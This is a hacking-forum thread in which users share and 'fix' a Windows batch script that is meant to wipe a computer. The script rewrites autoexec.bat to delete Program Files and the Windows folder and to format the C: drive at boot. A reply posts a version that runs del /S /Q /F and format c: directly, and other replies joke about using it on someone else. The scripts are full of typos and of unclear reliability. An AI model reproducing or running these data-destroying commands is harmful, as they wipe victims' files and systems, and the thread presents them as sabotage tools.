Hack Forums

Full Version: Destroy the computer totally
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
I found it in a hacking guide on the internet, dont really now what it does but he says it will destroy someones computer totally.

echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat

i guess it will destroy the startup thing.. happy destroyingThumbsup
change 1 line to @echo off
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat

many errors..

id change to

Quote:@echo off
cls
attrib -h -r "c:\autoexec.bat"
echo @echo off >>c:\autoexec.bat
echo del /S /Q /F %programfiles%\*.* >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo del c:\******s\*.* >nul >>c:\autoexec.bat
format c:/

but that prolly wont work either
i just copy it so dont know if it works, sorry for posting if it didnt
is there ne way to deleted the images only???
thanks man!!
sweet im gonna open this on my computer
(its been cheating on me)
i know because i caught my friend using it...
eh... firstly this is kind of script kiddie re-posting something you dont know what it is, secondly this only works on machines 2000 and lower, still. not bad.
"Deadly", "Destroy", "Destruction".. words not typically associated with batch files in my book.
this real long time ago didnt know what hacking, scripting, etc was back then
Pages: 1 2
Reference URL's